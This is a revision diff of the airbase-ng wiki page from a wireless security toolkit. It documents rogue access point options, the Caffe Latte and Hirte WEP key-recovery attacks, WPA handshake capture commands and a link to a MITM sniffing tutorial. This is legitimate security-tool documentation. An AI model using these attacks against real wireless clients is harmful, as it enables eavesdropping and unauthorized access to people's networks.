| Both sides previous revisionPrevious revisionNext revision | Previous revision | 
| airbase-ng [2009/01/26 21:16]  – Updated to reflect new SVN changes due to RC2. darkaudax | airbase-ng [2018/03/11 18:54] (current)  – Updated link to issue mister_x | 
|---|
| ====== Airbase-ng ====== | ====== Airbase-ng ====== | 
|  |  | 
| ++++++ IMPORTANT ++++++\\ |  | 
| ++++++ IMPORTANT ++++++\\ |  | 
| ++++++ IMPORTANT ++++++\\ |  | 
|  |  | 
| This functionality will be available in a future release. It is NOT available currently. |  | 
|  |  | 
| ++++++ IMPORTANT ++++++\\ |  | 
| ++++++ IMPORTANT ++++++\\ |  | 
| ++++++ IMPORTANT ++++++\\ |  | 
|  |  | 
| ===== Description ===== | ===== Description ===== | 
|  |  | 
| This documentation is still under development.  There is quite a bit more work to be done on this documentation.  Please post any comments or suggestions to [[http://tinyshell.be/aircrackng/forum/index.php?topic=3247.0|this thread in the Forum]]. | This documentation is still under development.  There is quite a bit more work to be done on this documentation.  Please post any comments or suggestions to [[http://forum.aircrack-ng.org/index.php?topic=3247.0|this thread in the Forum]]. | 
|  |  | 
| Airbase-ng is multi-purpose tool aimed at attacking clients as opposed to the Access Point (AP) itself.  Since it is so versatile and flexible, summarizing it is a challenge.  Here are some of the feature highlights: | Airbase-ng is multi-purpose tool aimed at attacking clients as opposed to the Access Point (AP) itself.  Since it is so versatile and flexible, summarizing it is a challenge.  Here are some of the feature highlights: | 
| ==== -q Quiet Flag ==== | ==== -q Quiet Flag ==== | 
|  |  | 
| This surpresses printing any statistics or status information. | This suppresses printing any statistics or status information. | 
|  |  | 
| ==== -v Verbose Flag ==== | ==== -v Verbose Flag ==== | 
| There are 3 arguments for "-Y": "in", "out" and "both", which specify the direction of frames to loop through the external application. Obviously "in" redirects only incoming (through the wireless NIC) frames, while outgoing frames aren't touched. "out" does the opposite, it only loops outgoing packets and "both" sends all both directions through the second tap interface. | There are 3 arguments for "-Y": "in", "out" and "both", which specify the direction of frames to loop through the external application. Obviously "in" redirects only incoming (through the wireless NIC) frames, while outgoing frames aren't touched. "out" does the opposite, it only loops outgoing packets and "both" sends all both directions through the second tap interface. | 
|  |  | 
| There is a small and simple example application to replay all frames on the second interface. The tool is called "replay.py" and is located in "./test". It's written in python, but the language doesn't matter.  It uses pcapy to read the frames and scapy to possibly alter/show and reinject the frames.  The tool as it is, simply replays all frames and prints a short summary of the received frames. The variable "packet" contains the complete ieee80211 packet, which can easily be dissected and modified using scapy. | There is a small and simple example application to replay all frames on the second interface. The tool is called "replay.py" and is located in "./test". It's written in python, but the language doesn't matter.  It uses pcapy to read the frames and scapy to potentially alter/show and reinject the frames.  The tool as it is, simply replays all frames and prints a short summary of the received frames. The variable "packet" contains the complete ieee80211 packet, which can easily be dissected and modified using scapy. | 
|  |  | 
| This can be compared to ettercap filters, but is more powerful, as a real programming language can be used to build complex logic for filtering and packet customization. The downside on using python is, that it adds a delay of around 100ms and the cpu utilizations is rather large on a high speed network, but its perfect for a demonstration with only a few lines of code. | This can be compared to ettercap filters, but is more powerful, as a real programming language can be used to build complex logic for filtering and packet customization. The downside on using python is, that it adds a delay of around 100ms and the cpu utilization is rather large on a high speed network, but its perfect for a demonstration with only a few lines of code. | 
|  |  | 
| ==== -c Channel Flag ==== | ==== -c Channel Flag ==== | 
| ==== -s Force Shared Key Authentication ==== | ==== -s Force Shared Key Authentication ==== | 
|  |  | 
| When specfiied, this forces shared key authentication for all clients. | When specified, this forces shared key authentication for all clients. | 
|  |  | 
| The soft AP will send an "authentication method unsupported" rejection to any open system | The soft AP will send an "authentication method unsupported" rejection to any open system | 
| ==== -L Caffe Latte Attack ==== | ==== -L Caffe Latte Attack ==== | 
|  |  | 
| Airbase-ng also contains the new caffe-latte attack, which is also implemented in aireplay-ng as attack "-6".  It can be used with "-L" or "--caffe-latte".  This attack specifically works against clients, as it waits for a broadcast arp request, which happens to be a gratuitous arp. See [[http://wiki.wireshark.org/Gratuitous_ARP|this]] for an explaination of what a [[http://wiki.wireshark.org/Gratuitous_ARP|gratuitous arp]] is.  It then flips a few bits in the sender MAC and IP, corrects the ICV (crc32) value and sends it back to the client, where it came from.  The point why this attack works in practice is, that at least windows sends gratuitous arps after a connection on layer 2 is established and a static ip is set, or dhcp fails and windows assigned an IP out of 169.254.X.X. | Airbase-ng also contains the new caffe-latte attack, which is also implemented in aireplay-ng as attack "-6".  It can be used with "-L" or "--caffe-latte".  This attack specifically works against clients, as it waits for a broadcast arp request, which happens to be a gratuitous arp. See [[http://wiki.wireshark.org/Gratuitous_ARP|this]] for an explanation of what a [[http://wiki.wireshark.org/Gratuitous_ARP|gratuitous arp]] is.  It then flips a few bits in the sender MAC and IP, corrects the ICV (crc32) value and sends it back to the client, where it came from.  The point why this attack works in practice is, that at least windows sends gratuitous arps after a connection on layer 2 is established and a static ip is set, or dhcp fails and windows assigned an IP out of 169.254.X.X. | 
|  |  | 
| "-x <pps>" sets the number of packets per second to send when performing the caffe-latte attack. At the moment, this attack doesn't stop, it continuously sends arp requests.  Airodump-ng is needed to capture the replys. | "-x <pps>" sets the number of packets per second to send when performing the caffe-latte attack. At the moment, this attack doesn't stop, it continuously sends arp requests.  Airodump-ng is needed to capture the replys. | 
| This attack listens for an ARP request or IP packet from the client.  Once one is received, a small amount of PRGA is extracted and then used to create an ARP request packet targeted to the client.  This ARP request is actually made of up of multiple packet fragments such that when received, the client will respond. | This attack listens for an ARP request or IP packet from the client.  Once one is received, a small amount of PRGA is extracted and then used to create an ARP request packet targeted to the client.  This ARP request is actually made of up of multiple packet fragments such that when received, the client will respond. | 
|  |  | 
| This attack works especially well against ad-hoc networks.  As well it can be used against softAP clients and normal AP clients. | This attack works especially well against ad-hoc networks.  As well, it can be used against softAP clients and normal AP clients. | 
|  |  | 
| This option includes added compatibility with some clients. As well, random source IPs and MACs for cfrag attack are included to evade simple flood protection. | This option includes added compatibility with some clients. As well, random source IPs and MACs for cfrag attack are included to evade simple flood protection. | 
| ==== -x Number of Packets per Second ==== | ==== -x Number of Packets per Second ==== | 
|  |  | 
| This sets the number of packets per second that packets will be sent (default: 100). | This sets the number of packets per second transmission rate (default: 100). | 
|  |  | 
| ==== -y Disable Broadcast Probes ==== | ==== -y Disable Broadcast Probes ==== | 
| When using this option, the fake AP will not respond to broadcast probes.  A broadcast probe is where the the specific AP is not identified uniquely.  Typically, most APs will respond with probe responses to a broadcast probe.  This flag will prevent this happening.  It will only respond when the specific AP is uniquely requested. | When using this option, the fake AP will not respond to broadcast probes.  A broadcast probe is where the specific AP is not identified uniquely.  Typically, most APs will respond with probe responses to a broadcast probe.  This flag will prevent this happening.  It will only respond when the specific AP is uniquely requested. | 
|  |  | 
| ==== -0 Set WPA/WEP Tags ==== | ==== -0 Set WPA/WEP Tags ==== | 
|  |  | 
| ==== -z Set WPA Tag ==== | ==== -z Set WPA Tag ==== | 
| This specifies the WPA beacon tags.  The valid values are: 1=WEP40 2=TKIP 3=WRAP 4=CCMP 5=WEP104 | This specifies the WPA beacon tags.  The valid values are: 1=WEP40 2=TKIP 3=WRAP 4=CCMP 5=WEP104.  It is recommended that you also set the WEP flag in the beacon with "-W 1" when using this parameter since some clients get confused without it. | 
|  |  | 
| ==== -Z Set WPA2 Tag ==== | ==== -Z Set WPA2 Tag ==== | 
| This specifies the WPA2 beacon tags.  The valid values are the same as WPA. | This specifies the WPA2 beacon tags.  The valid values are the same as WPA.  It is recommended that you also set the WEP flag in the beacon with "-W 1" when using this parameter since some clients get confused without it. | 
|  |  | 
| ==== -V EAPOL Type ==== | ==== -V EAPOL Type ==== | 
| This specifies the valid EAPOL types.  The valid values are: 1=MD5 2=SHA1 3=auto | This specifies the valid EAPOL types.  The valid values are: 1=MD5 2=SHA1 3=auto | 
|  |  | 
|  |  | 
| ==== -F File Name Prefix ==== | ==== -F File Name Prefix ==== | 
| The -P option must also be specified in order to use this option.  The wildcard ESSIDs will also be beaconed this number of seconds.  A good typical value to use is "-C 60". | The -P option must also be specified in order to use this option.  The wildcard ESSIDs will also be beaconed this number of seconds.  A good typical value to use is "-C 60". | 
|  |  | 
| When running in the default mode (no ESSIDs) or with the -P parameter, the -C option can be used to enable beacon broadcasting of the ESSIDs seen by the directed probes. This allows one client which is probing for a network to result in a beacon for the same network for a brief period of time (the -C parameter, which is the number of seconds to broadcast new probe requests). This works well when some clients are sending directed probes, while others listen passively for beacons. A client which does directed probes results in a beacon which wakes up the passive client and causes the passive client to joint he network as well. This is especially useful with Vista clients (which listens passively for beacons in many cases) which share the same WiFi? network as Linux/Mac OS X clients which send directed probes. | When running in the default mode (no ESSIDs) or with the -P parameter, the -C option can be used to enable beacon broadcasting of the ESSIDs seen by the directed probes. This allows one client which is probing for a network to result in a beacon for the same network for a brief period of time (the -C parameter, which is the number of seconds to broadcast new probe requests). This works well when some clients are sending directed probes, while others listen passively for beacons. A client which does directed probes results in a beacon which wakes up the passive client and causes the passive client to join the network as well. This is especially useful with Vista clients (which listens passively for beacons in many cases) which share the same WiFi? network as Linux/Mac OS X clients which send directed probes. | 
|  |  | 
| ==== Beacon Frames ==== | ==== Beacon Frames ==== | 
| ==== Control Frame Handling ==== | ==== Control Frame Handling ==== | 
|  |  | 
| Control frames (ack/rts/cts) are never sent by the code, but sometimes read (the firmware should handle that).  Management and data frames can always be sent, no need to authenticate before association or even sending of data frames.  They can be sent right away.  Real clients will still authenticate and associate and the softAP should send the correct answers, but airbase-ng doesn't care to check the properties and simply allows all stations to connect (with respect to the filtered ESSIDs and client MACs). So an authentication cannot fail (except if SKA is forced), as can't an association.  The AP will never send deauthentication or disassociation frames on normal operation mode. | Control frames (ack/rts/cts) are never sent by the code, but sometimes read (the firmware should handle that).  Management and data frames can always be sent, no need to authenticate before association or even sending of data frames.  They can be sent right away.  Real clients will still authenticate and associate and the softAP should send the correct answers, but airbase-ng doesn't care to check the properties and simply allows all stations to connect (with respect to the filtered ESSIDs and client MACs). So an authentication cannot fail (except if SKA is forced). Same for the association phase.  The AP will never send deauthentication or disassociation frames on normal operation mode. | 
|  |  | 
| It has been implemented in a way to maximizes the compatibility and the chances to keep a station connected. | It has been implemented in a way to maximizes the compatibility and the chances to keep a station connected. | 
| ==== Filtering ==== | ==== Filtering ==== | 
|  |  | 
| There is rich filtering capabilites. | There are rich filtering capabilities. | 
|  |  | 
| To limit the supported ESSIDs, you can specify "-e <ESSID>" to add an ESSID to the list of allowed ESSIDs, or use "-E <ESSIDfile>" to read a list of allowed ESSIDs out of this file (one ESSID per line). | To limit the supported ESSIDs, you can specify "-e <ESSID>" to add an ESSID to the list of allowed ESSIDs, or use "-E <ESSIDfile>" to read a list of allowed ESSIDs out of this file (one ESSID per line). | 
| * -d 00:06:62:F8:1E:2C filters the data captured to fake AP MAC (this is optional) | * -d 00:06:62:F8:1E:2C filters the data captured to fake AP MAC (this is optional) | 
| * -w specifies the file name prefix of the captured data | * -w specifies the file name prefix of the captured data | 
| * ath0 specifies the wireless interface to to capture data on | * wlan0 specifies the wireless interface to capture data on | 
|  |  | 
| Here is what the window looks like when airbase-ng has received a packet from the client and has successfully started the attack: | Here is what the window looks like when airbase-ng has received a packet from the client and has successfully started the attack: | 
| ==== Caffe Latte Attack in Access Point mode ==== | ==== Caffe Latte Attack in Access Point mode ==== | 
|  |  | 
| This attack obtains the WEP key from a client.  It depends on receiving at least one gratutitous ARP request from the client after it has associated with the fake AP. | This attack obtains the WEP key from a client.  It depends on receiving at least one gratuitous ARP request from the client after it has associated with the fake AP. | 
|  |  | 
| Enter: | Enter: | 
| Enter: | Enter: | 
|  |  | 
| airbase-ng -c 9 -e teddy -z 2 rausb0 | airbase-ng -c 9 -e teddy -z 2 -W 1 rausb0 | 
|  |  | 
| Where: | Where: | 
| * -e teddy filters a single SSID | * -e teddy filters a single SSID | 
| * -z 2 specifies TKIP | * -z 2 specifies TKIP | 
|  | * -W 1 set WEP flag because some clients get confused without it. | 
| * rausb0 specifies the wireless interface to use | * rausb0 specifies the wireless interface to use | 
|  |  | 
|  |  | 
| * -c 9 specifies the channel | * -c 9 specifies the channel | 
| * -d 00:C0:C6:94:F4:87 filters the data captured to fake AP MAC.  It is MAC of card running the the fake AP.  This is optional. | * -d 00:C0:C6:94:F4:87 filters the data captured to fake AP MAC.  It is MAC of card running the fake AP.  This is optional. | 
| * -w specifies the file name of the captured data | * -w specifies the file name of the captured data | 
| * wlan0 specifies the wireless interface to capture data on | * wlan0 specifies the wireless interface to capture data on | 
|  |  | 
| When the client connects, notice the "WPA handshake: 00:C0:C6:94:F4:87" in the top right-hand corner of the screen below: | When the client connects, notice the "WPA handshake: 00:C0:C6:94:F4:87" in the top right-hand corner of the screen below: | 
|  |  | 
| CH  9 ][ Elapsed: 5 mins ][ 2008-03-21 10:26 ][ WPA handshake: 00:C0:C6:94:F4:87 | CH  9 ][ Elapsed: 5 mins ][ 2008-03-21 10:26 ][ WPA handshake: 00:C0:C6:94:F4:87 | 
|  |  | 
| Enter: | Enter: | 
|  |  | 
| airbase-ng -c 9 -e teddy -Z 4 rausb0 | airbase-ng -c 9 -e teddy -Z 4 -W 1 rausb0 | 
|  |  | 
| The balance is the same as the WPA handshake capture. | The balance is the same as the WPA handshake capture. | 
| A new tap interface "atX" will be created, which acts as the "wired side" to the AP. In order to use the AP, this new interface must be brought up with ifconfig and needs an IP. The assigned MAC is automatically set to the BSSID [by default the wireless interface MAC]. Once an IP is assigned and the client uses a static IP out of the same subnet, there is a working Ethernet connection between the AP and the client. Any daemon can be assigned to that interface, for example a dhcp and dns server. Together with kernel ip_forwarding and a proper iptable rule for masquerading, the softAP acts as a wireless router. Any tool, which operates on ethernet can be bound to this interface. | A new tap interface "atX" will be created, which acts as the "wired side" to the AP. In order to use the AP, this new interface must be brought up with ifconfig and needs an IP. The assigned MAC is automatically set to the BSSID [by default the wireless interface MAC]. Once an IP is assigned and the client uses a static IP out of the same subnet, there is a working Ethernet connection between the AP and the client. Any daemon can be assigned to that interface, for example a dhcp and dns server. Together with kernel ip_forwarding and a proper iptable rule for masquerading, the softAP acts as a wireless router. Any tool, which operates on ethernet can be bound to this interface. | 
|  |  | 
| This [[http://tinyshell.be/aircrackng/forum/index.php?topic=3983.msg23110#msg23110|forum posting]] provides an example of the commands needed to setup the softAP. This [[http://tinyshell.be/aircrackng/forum/index.php?topic=4495.msg25342#msg25342|forum posting]] provides IPTables troubleshooting tip. | This [[http://forum.aircrack-ng.org/index.php?topic=3983.msg23110#msg23110|forum posting]] provides an example of the commands needed to setup the softAP. This [[http://forum.aircrack-ng.org/index.php?topic=4495.msg25342#msg25342|forum posting]] provides IPTables troubleshooting tip. | 
|  |  | 
| Here are some links that may find useful in getting bridging operational.  In the madwifi-project.org one, just use at0 where ath0 is referenced. | Here are some links that may find useful in getting bridging operational.  In the madwifi-project.org one, just use at0 where ath0 is referenced. | 
| ==== How Does the Hirte Attack Work? ==== | ==== How Does the Hirte Attack Work? ==== | 
|  |  | 
| This is client attack which can use any IP or ARP packet.  The follow describes the attack in detail. | This is a client attack which can use any IP or ARP packet.  The following describes the attack in detail. | 
|  |  | 
| The basic idea is to generate an ARP request to be sent back to the client such that the client responds. | The basic idea is to generate an ARP request to be sent back to the client such that the client responds. | 
| The source IP is in the packet received from the client is in a known position - position 23 for ARP or 21 for IP.  ARP is assumed if the packet is 68 or 86 bytes in length plus a broadcast destination MAC address.  Otherwise it is assumed to be an IP packet. | The source IP is in the packet received from the client is in a known position - position 23 for ARP or 21 for IP.  ARP is assumed if the packet is 68 or 86 bytes in length plus a broadcast destination MAC address.  Otherwise it is assumed to be an IP packet. | 
|  |  | 
| In order to send a valid ARP request back to the client, we need move the source IP to position 33.  Of course you can't simply move bytes around, that would invalidate the packet.  So instead, we use the concept of packet fragmentation to achieve this.  The ARP request is sent to the client as two fragments.  The first fragment length is selected such that the incoming source IP is moved to position 33 when the fragments are ultimately reassembled by the client.  The second fragment is the original packet received from the client. | In order to send a valid ARP request back to the client, we need to move the source IP to position 33.  Of course you can't simply move bytes around, that would invalidate the packet.  So instead, we use the concept of packet fragmentation to achieve this.  The ARP request is sent to the client as two fragments.  The first fragment length is selected such that the incoming source IP is moved to position 33 when the fragments are ultimately reassembled by the client.  The second fragment is the original packet received from the client. | 
|  |  | 
| In the case of an IP packet, a similar technique is used.  However due to the more limited amount of PRGA available, there are three fragments plus the original packet used. | In the case of an IP packet, a similar technique is used.  However due to the more limited amount of PRGA available, there are three fragments plus the original packet used. | 
|  |  | 
| In all cases, bit flipping is used to ensure the CRC is correct.  Additionally, bit flipping is used to ensure the source MAC of the ARP contained within the fragmented packet is not multicast. | In all cases, bit flipping is used to ensure the CRC is correct.  Additionally, bit flipping is used to ensure the source MAC of the ARP contained within the fragmented packet is not multicast. | 
|  |  | 
|  | ==== SoftAP with Internet connection and MITM sniffing ==== | 
|  |  | 
|  | This [[http://forum.aircrack-ng.org/index.php?topic=7172.0|forum thread]] provides a tutorial for SoftAP with Internet connection and MITM sniffing. | 
|  |  | 
|  |  | 
| ===== Usage Troubleshooting ===== | ===== Usage Troubleshooting ===== | 
| ==== Driver Limitations ==== | ==== Driver Limitations ==== | 
|  |  | 
| Some drivers like r8187 don't capture packets by itself.  The implication of this is that the softAP will not show up in airodump-ng.  You can get around this by using two wireless cards, one to inject and one to capture. Alternatively, you can use the rtl8187 driver. | Some drivers like r8187 don't capture packets transmitted by itself.  The implication of this is that the softAP will not show up in airodump-ng.  You can get around this by using two wireless cards, one to inject and one to capture. Alternatively, you can use the rtl8187 driver. | 
|  |  | 
| The madwifi-ng currently does not support the Caffe-Latte or Hirte attacks.  The root cause is deep within the madwifi-ng driver.  The driver does not properly synchronize speeds with the client and thus the client never receives the packets. If you need to use these attacks, try using the ath5k driver. | The madwifi-ng currently does not support the Caffe-Latte or Hirte attacks.  The root cause is deep within the madwifi-ng driver.  The driver does not properly synchronize speeds with the client and thus the client never receives the packets. If you need to use these attacks, try using the ath5k driver. | 
| ==== Broken SKA error message ==== | ==== Broken SKA error message ==== | 
|  |  | 
| You receive "Broken SKA: <MAC address> (expected: ??, got ?? bytes)" or similar. When using the "-S" option with values different then 128, some clients fail.  This message indicates the number of bytes actually received was different that the number requested.  Either don't use the option or try different values of "-S" to see which one elminates the error. | You receive "Broken SKA: <MAC address> (expected: ??, got ?? bytes)" or similar. When using the "-S" option with values different then 128, some clients fail.  This message indicates the number of bytes actually received was different that the number requested.  Either don't use the option or try different values of "-S" to see which one eliminates the error. | 
|  |  | 
| ==== "write failed: Message too long" / "wi_write(): Illegal seek" error messages ==== | ==== "write failed: Message too long" / "wi_write(): Illegal seek" error messages ==== | 
|  |  | 
| See this [[http://trac.aircrack-ng.org/ticket/469|trac ticket]] for a workaround.  The trac ticket explains the root cause and how to adjust the MTU to avoid the problem. | See this [[https://github.com/aircrack-ng/aircrack-ng/issues/469|GitHub issue]] for a workaround.  The issue explains the root cause and how to adjust the MTU to avoid the problem. | 
|  |  | 
|  | ==== Error creating tap interface: Permission denied ==== | 
|  |  | 
| ===== Related Commands ===== | See the following [[faq#why_do_i_get_error_creating_tap_interfacepermission_denied_or_a_similar_message|FAQ entry]]. | 
|  |  | 
| Since the version has not been officially released, the aireplay-ng documentation does not reflect new features which are related to airbase-ng.  This section is some documentation on this. | ===== Related Commands ===== | 
|  |  | 
| "-D" is a new option that has been added to aireplay-ng.  By default, aireplay-ng listens for beacons from the specified AP and fails if it does not hear any beacons.  The "-D" option disables this requirement. | "-D" is a new option that has been added to aireplay-ng.  By default, aireplay-ng listens for beacons from the specified AP and fails if it does not hear any beacons.  The "-D" option disables this requirement. |